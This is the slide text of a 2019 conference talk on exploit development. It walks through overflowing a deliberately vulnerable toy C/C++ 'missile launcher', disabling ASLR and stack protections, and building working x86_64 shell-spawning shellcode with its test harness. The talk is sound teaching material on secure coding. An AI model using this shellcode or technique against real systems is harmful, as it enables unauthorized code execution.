SlideShare a Scribd company logo

The Anatomy of an Exploit (NDC TechTown 2019))

Patricia Aas
Patricia Aas

Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.

Technology
1 of 104
Download to read offline
Turtle Sec @pati_gallardo
The Anatomy of an Exploit NDC TechTown 2019 Patricia Aas Turtle Sec @pati_gallardo
Patricia Aas - Trainer & Consultant Turtle Sec C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/her @pati_gallardo
The Weird Machine @pati_gallardo
The Target The Exploit @pati_gallardo @halvarflake5 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
The Data is the Program and the Program is the Data Memory Loaders Heap Linkers Stack Memory Allocator @pati_gallardo 6
Exploit Development is Programming the Weird Machine 7 @pati_gallardo
Inherently Dangerous Function @pati_gallardo
printf("Secret: "); gets(response); @pati_gallardo 9
10 launch.c @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); gets(response); if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } @olvemaudal
11 $ hello$ clang -o launch launch.c launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration] gets(response); ^ 1 warning generated. /tmp/launch-0d1b0f.o: In function `authenticate_and_launch': launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used. CWE-242: Use of Inherently Dangerous Function @pati_gallardo
12 $ hello CMakeLists.txt # Wargames C # ------------------------- add_executable(launch src/launch.c) # Get gets set_property(TARGET launch PROPERTY C_STANDARD 99) # Allow gets target_compile_options(launch PRIVATE -Wno-deprecated-declarations) CMake: Getting gets @pati_gallardo
13 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
14 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar *** buffer overflow detected ***: ./launch terminated Aborted (core dumped) Unhappy Day Scenario @pati_gallardo Unstable Weird State
Fortify Protection @pati_gallardo
16 $ hello CMakeLists.txt # Remove Fortify protection in libc # *** buffer overflow detected ***: ./launch terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -D_FORTIFY_SOURCE=0) CMake : Remove fortify protection from libc @pati_gallardo
17 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied *** stack smashing detected ***: <unknown> terminated Aborted (core dumped) CMake : Remove fortify protection from libc @pati_gallardo
Stack Canaries @pati_gallardo
Stack Canary 100 Return address 99 Stack Canary 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 19 @pati_gallardo
20 $ hello CMakeLists.txt # remove the stack protector # *** stack smashing detected ***: <unknown> terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -fno-stack-protector) CMake: Turn off stack protector @pati_gallardo
21 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Segmentation fault (core dumped) CMake: Turn off stack protector What’s going on? Let’s check on godbolt @pati_gallardo
Debug: Local variables on the stack Release: Local variables optimized out @pati_gallardo
Let’s try the Debug build then! @pati_gallardo
24 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1869443685 missiles Access denied Operation complete Debug Build Somebody’s bools are acting weird :D ✔ @pati_gallardo
Prefer C++ to C, right? @pati_gallardo
26 $ hello CMakeLists.txt # Wargames C++ # ------------------------- add_executable(launch_cpp src/launch.cpp) Start from scratch with C++ @pati_gallardo
27 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main() { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Much better, right?
28 $ hello$ clang++ -o launch_cpp launch.cpp $ Not even a warning! @pati_gallardo Must be better, right?
29 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
30 $ hello$ clang++ -O3 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Operation complete Segmentation fault (core dumped) Let’s test the release build @pati_gallardo
31 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1852796274 missiles Segmentation fault (core dumped) Ok, debug then... Both n_missiles and allowaccess overwritten ✔ @pati_gallardo Ops...
Controlling stack variables @pati_gallardo
int n_missiles = 2; bool allowaccess = false; @pati_gallardo 33
34 launch.cpp @pati_gallardovoid authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); }
35 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access granted Launching 42 missiles Operation complete $ Lets try a shorter string n_missiles -> 42 -> 0x2a -> ‘*’ ✔ @pati_gallardo
36 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBCd Access granted Launching 100 missiles Operation complete Lets try a shorter string n_missiles -> 100 -> 0x64 -> ‘d’ ✔ @pati_gallardo
37 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB0d Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB1d Access granted Launching 100 missiles Operation complete Controlling allowaccess Controlling allowaccess ✔ @pati_gallardo
Automate, automate! @pati_gallardo@pati_gallardo
@pati_gallardo 39 $ hello simple_exploit.c int main(void) { struct { uint8_t buffer[8]; bool allowaccess; char n_missiles; } sf; memset(&sf, 0, sizeof sf); sf.allowaccess = true; sf.n_missiles = 42; fwrite(&sf, sizeof sf, 1, stdout); } Automate the string @pati_gallardo @olvemaudal
40 $ hello$ clang -o simple_exploit simple_exploit.c $ ./simple_exploit | ./launch WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete $ ./simple_exploit | ./launch_cpp WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete Let’s try it out! ✔ ✔ @pati_gallardo
Fixing the C++ code! @pati_gallardo
42 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); size_t max = sizeof response; std::cin >> std::setw(max) >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Set the width on cin
43 $ hello$ clang++ -o launch_fixed launch_fixed.cpp $ ./launch_fixed WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access denied Operation complete $ ./simple_exploit | ./launch_fixed WarGames MissileLauncher v0.1 Secret: Access denied Operation complete Let’s test it! @pati_gallardo
Use sed to binary patch @pati_gallardo
45 $ hello $ objdump -M intel -d ./launch | grep -A 7 "<_Z23authenticate_and_launchv>:" 0000000000400890 <_Z23authenticate_and_launchv>: 400890: 55 push rbp 400891: 48 89 e5 mov rbp,rsp 400894: 48 83 ec 30 sub rsp,0x30 400898: 48 bf 4b 0a 40 00 00 movabs rdi,0x400a4b 40089f: 00 00 00 4008a2: c7 45 fc 02 00 00 00 mov DWORD PTR [rbp-0x4],0x2 4008a9: c6 45 fb 00 mov BYTE PTR [rbp-0x5],0x0 Use sed to binary patch $ cp launch launch_mod $ sed -i "s/xc7x45xfcx02/xc7x45xfcx2a/" ./launch_mod $ sed -i "s/xc6x45xfbx00/xc6x45xfbx01/" ./launch_mod @pati_gallardo n_missiles = 2 allowaccess = false n_missiles = 42 and allowaccess = true
46 $ hello $ ./launch_mod WarGames MissileLauncher v0.1 Secret: David Access granted Launching 42 missiles Operation complete Use sed to binary patch ✔$ ./launch_mod WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 42 missiles Operation complete $ ./launch_mod WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 42 missiles Operation complete ✔ ✔ @pati_gallardo
Stack Buffer Exploit @pati_gallardo
Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode 48 @pati_gallardo
Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49 @pati_gallardo
Stack grows toward lower addresses Writes go toward higher addresses ptr++ 50 Write direction vs Stack growing direction @pati_gallardo 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Write Payload
100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Stack grows toward lower addresses Instructions also go toward higher addresses 51 Write direction vs Stack growing direction @pati_gallardo
52 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } Basic structure of the exploit code
53 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } What we need to know Offset of return address from buffer on the stack Address of buffer in memory
54 launch_bigger.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[110]; printf("%pn", &response); printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Lets make some changes to make it easier Bigger buffer and get the address
ASLR echo 0 > /proc/sys/kernel/randomize_va_space @pati_gallardo 55
Metasploit pattern_create and pattern_offset Used to find the offset of the return pointer from the start of the buffer Metasploit pattern_create Creates a string of un-repeated character sequences Metasploit pattern_offset Gives the offset in the character sequence of this section @pati_gallardo 56
57 @pati_gallardo$ pattern_create -l 150 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 $ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp $ gdb -q ./launch_bigger (gdb) br *authenticate_and_launch+205 Breakpoint 1 at 0x4008dd (gdb) r Starting program: ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 Access granted Launching 1698771301 missiles Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() () (gdb) x/1xg $sp 0x7fffffffdd18: 0x3765413665413565 (gdb) q $ pattern_offset -q 3765413665413565 [*] Exact match at offset 136 Find the offset of the return address Offset of return address from buffer on the stack Address of buffer in memory
Stack Buffer Exploit @pati_gallardo Attempt 1
59 simple_stack_overflow_test.c @pati_gallardo#include <stdio.h> #include <string.h> char shellcode[] = "xebx17" // jmp <push_str> "x5f" // <pop_str>: pop %rdi "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x48x89xe6" // mov %rsp,%rsi "x48x89x54x24x08" // mov %rdx,0x8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // <push_str>: callq <pop_str> "/bin/sh"; int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } See talk at CppCon 2018 for details
60 $ hellowargames$ clang -z execstack -o simple_stack_overflow_test simple_stack_overflow_test.c wargames$ ./simple_stack_overflow_test len:37 bytes $ Let’s just test it @pati_gallardo ✔
61 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied Let’s try it @pati_gallardo It just hangs: /bin/sh string not null terminated
Stack Buffer Exploit @pati_gallardo Attempt 2
63 $ hello simple_stack_overflow_test2.c char shellcode[] = "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2fx2fx73x68" // movabs $0x68732f2f6e69622f,%rbx "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } @pati_gallardo Null terminate the string in the shellcode Hex value Ascii Reverse Ascii 68732f2f6e69622f hs//nib/ /bin//sh
64 $ hellowargames$ clang -z execstack -fno-stack-protector -o simple_stack_overflow_test2 simple_stack_overflow_test2.c wargames$ ./simple_stack_overflow_test2 len:30 bytes $ Let’s just test it @pati_gallardo ✔
65 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 21397 is executing new program: /bin/dash [Inferior 1 (process 21397) exited normally] (gdb) Let’s try it @pati_gallardo Starts /bin/bash but exits immediately ✔
66 $ hellowargames$ clang -o simple_stack_overflow_exploit2 simple_stack_overflow_exploit2.c wargames$ ./simple_stack_overflow_exploit2 > file wargames$ strace -o strace.log ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied wargames$ grep ENOTTY strace.log ioctl(0, TCGETS, 0x7fffffffeba0) = -1 ENOTTY (Inappropriate ioctl for device) What’s wrong? Lets look at strace @pati_gallardo The shell fails to start because of TTY? Google!
Stack Buffer Exploit @pati_gallardo Attempt 3
New Idea! Try to close STDIN and reopen tty first @pati_gallardo 68
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 69 @pati_gallardo
70 $ hello shellcode.c #include <unistd.h> #include <fcntl.h> int main(void) { close(0); open("/dev/tty", O_RDWR); char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 71 @pati_gallardo
72 $ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c wargames$ ./shellcode $ wargames$ ldd shellcode not a dynamic executable Build it statically, with no canary @pati_gallardo
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 73 @pati_gallardo
74 $ hellowargames$ objdump -d shellcode | grep -A 14 "<main>" 0000000000400b30 <main>: 400b30: 48 83 ec 18 sub $0x18,%rsp 400b34: 31 ff xor %edi,%edi 400b36: e8 15 8b 04 00 callq 449650 <__close> 400b3b: bf 44 1f 49 00 mov $0x491f44,%edi 400b40: be 02 00 00 00 mov $0x2,%esi 400b45: 31 c0 xor %eax,%eax 400b47: e8 a4 85 04 00 callq 4490f0 <__libc_open> 400b4c: b8 4d 1f 49 00 mov $0x491f4d,%eax 400b51: 66 48 0f 6e c0 movq %rax,%xmm0 400b56: 48 89 e6 mov %rsp,%rsi 400b59: 66 0f 7f 06 movdqa %xmm0,(%rsi) 400b5d: bf 4d 1f 49 00 mov $0x491f4d,%edi 400b62: 31 d2 xor %edx,%edx 400b64: e8 47 7f 04 00 callq 448ab0 <__execve> Look at the assembly of main @pati_gallardo
75 %rax # System call %rdi %rsi %rdx %r10 0x3 3 sys_close unsigned int fd 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] 0x101 257 sys_openat int dfd const char * filename int flags int mode The syscalls involved @pati_gallardo
76 $ hellowargames$ objdump -d shellcode | grep -A 6 "<__close>:" 0000000000449650 <__close>: 449650: 8b 05 b6 31 27 00 mov 0x2731b6(%rip),%eax 449656: 85 c0 test %eax,%eax 449658: 75 16 jne 449670 <__close+0x20> 44965a: b8 03 00 00 00 mov $0x3,%eax 44965f: 0f 05 syscall 449661: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
77 $ hello shellcode_asm.c // -------------------------------------------------------- // close // -------------------------------------------------------- "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "mov $0x3, %alnt" // Write the syscall number (3) to al "syscallnt" // Do the syscall %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
78 $ hello wargames$ objdump -d shellcode | grep -A 30 "<__libc_open>:" 00000000004490f0 <__libc_open>: 4490f0: 48 83 ec 68 sub $0x68,%rsp 4490f4: 41 89 f2 mov %esi,%r10d 4490f7: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 4490fe: 00 00 449100: 48 89 44 24 28 mov %rax,0x28(%rsp) 449105: 31 c0 xor %eax,%eax 449107: 41 83 e2 40 and $0x40,%r10d 44910b: 48 89 54 24 40 mov %rdx,0x40(%rsp) 449110: 75 4e jne 449160 <__libc_open+0x70> 449112: 89 f0 mov %esi,%eax 449114: 25 00 00 41 00 and $0x410000,%eax 449119: 3d 00 00 41 00 cmp $0x410000,%eax 44911e: 74 40 je 449160 <__libc_open+0x70> 449120: 8b 05 e6 36 27 00 mov 0x2736e6(%rip),%eax 449126: 85 c0 test %eax,%eax 449128: 75 61 jne 44918b <__libc_open+0x9b> 44912a: 89 f2 mov %esi,%edx 44912c: b8 01 01 00 00 mov $0x101,%eax 449131: 48 89 fe mov %rdi,%rsi 449134: bf 9c ff ff ff mov $0xffffff9c,%edi 449139: 0f 05 syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
79 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write the syscall number (257) "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
80 $ hellowargames$ objdump -d shellcode | grep -A 3 "<__execve>:" 0000000000448ab0 <__execve>: 448ab0: b8 3b 00 00 00 mov $0x3b,%eax 448ab5: 0f 05 syscall 448ab7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
81 $ hello shellcode_asm.c // -------------------------------------------------------- // execve // -------------------------------------------------------- "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx: // /bin//sh = 2f 62 69 6e 2f 2f 73 68 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rdint" // Put a pointer to the string in rdi "push %rdxnt" // Push a null to terminate the array "push %rdint" // Push the pointer to the string "mov %rsp, %rsint" // Put a pointer to argv in rsi "mov $0x3b, %alnt" // Write the syscall number 59 to al "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
82 $ hellowargames$ clang -o shellcode_asm shellcode_asm.c wargames$ ./shellcode_asm $ Compile and test the assembly @pati_gallardo ✔
83 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 29 "<main>" 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b8 01 01 00 00 mov $0x101,%eax 4004ae: 0f 05 syscall 4004b0: 48 31 d2 xor %rdx,%rdx 4004b3: 48 31 c0 xor %rax,%rax 4004b6: 50 push %rax 4004b7: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004be: 2f 73 68 4004c1: 53 push %rbx 4004c2: 48 89 e7 mov %rsp,%rdi 4004c5: 52 push %rdx 4004c6: 57 push %rdi 4004c7: 48 89 e6 mov %rsp,%rsi 4004ca: b0 3b mov $0x3b,%al 4004cc: 0f 05 syscall Look at the assembly of main Null bytes in the shellcode!
84 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write syscall number 257 to eax "syscallnt" // Do the syscall @pati_gallardo %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode
85 $ hello shellcode_asm.c "mov $0xFF, %alnt" // Write syscall number 255 to al "inc %raxnt" "inc %raxnt" //"mov $0x101, %eaxnt" // Write syscall number 257 to eax %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo Write 255 and inc it twice
86 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 31 "<main>" 0000000000400480 <main>: 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b0 ff mov $0xff,%al 4004ab: 48 ff c0 inc %rax 4004ae: 48 ff c0 inc %rax 4004b1: 0f 05 syscall 4004b3: 48 31 d2 xor %rdx,%rdx 4004b6: 48 31 c0 xor %rax,%rax 4004b9: 50 push %rax 4004ba: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004c1: 2f 73 68 4004c4: 53 push %rbx 4004c5: 48 89 e7 mov %rsp,%rdi 4004c8: 52 push %rdx 4004c9: 57 push %rdi 4004ca: 48 89 e6 mov %rsp,%rsi 4004cd: b0 3b mov $0x3b,%al 4004cf: 0f 05 syscall Look at the assembly of main close open execve
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 87 @pati_gallardo
88 shellcode_test.c @pati_gallardochar shellcode[] = "x48x31xff" // xor %rdi,%rdi "x48x31xc0" // xor %rax,%rax "xb0x03" // mov $0x3,%al "x0fx05" // syscall "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx64x65x76x2f" // movabs $0x7974742f7665642f,%rbx "x74x74x79" // "x53" // push %rbx "x48x89xe6" // mov %rsp,%rsi "x48x31xd2" // xor %rdx,%rdx "x48x31xff" // xor %rdi,%rdi "x4dx31xd2" // xor %r10,%r10 "xb0xff" // mov $0xff,%al "x48xffxc0" // inc %rax "x48xffxc0" // inc %rax "x0fx05" // syscall "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2f" // movabs $0x68732f2f6e69622f,%rbx "x2fx73x68" // "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall close open execve Let’s put the bytes in a char buffer
89 $ hello shellcode_close_test.c int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } Let’s run the char buffer @pati_gallardo
90 $ hello$ clang -z execstack -o shellcode_test shellcode_test.c $ ./shellcode_test len:77 bytes $ Compile and test the assembly @pati_gallardo ✔
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 91 @pati_gallardo
92 $ hellowargames$ clang -o shellcode_exploit shellcode_exploit.c wargames$ ./shellcode_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 29337 is executing new program: /bin/dash $ Use the exploit in gdb @pati_gallardo ✔
Turtle Sec @pati_gallardo WIN!
94 $ hellowargames$ ./shellcode_exploit | ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied $ Use the exploit with pipe @pati_gallardo ✔
Turtle Sec @pati_gallardo WIN! WIN!
Cheats - We turned off ASLR - We made the stack executable - We turned off stack canaries - We printed the address of the buffer @pati_gallardo 96
Examples of newer exploit techniques - Information Leaks - to defy ASLR - Return Oriented Programming - to defy non-executable stack @pati_gallardo 97
The Target The Exploit @pati_gallardo @halvarflake98 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
Programs need to be deterministically correct Exploits need to be probabilistically correct 99 @pati_gallardo
Exploit Development is Programming the Weird Machine 100 @pati_gallardo
Turtle Sec Questions? Inspired by the training (In)Security in C++, Secure Coding Practices in C++ Patricia Aas, TurtleSec @pati_gallardo
Turtle Sec Photos from pixabay.com Patricia Aas, TurtleSec @pati_gallardo
Turtle Sec @pati_gallardo
104 LINUX SYSTEM CALL TABLE FOR X86 64 http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ Hex to decimal converter https://www.rapidtables.com/convert/number/hex-to-decimal.html https://www.asciitohex.com Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar Flake https://vimeo.com/252868605 Resources @pati_gallardo

Recommended

The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
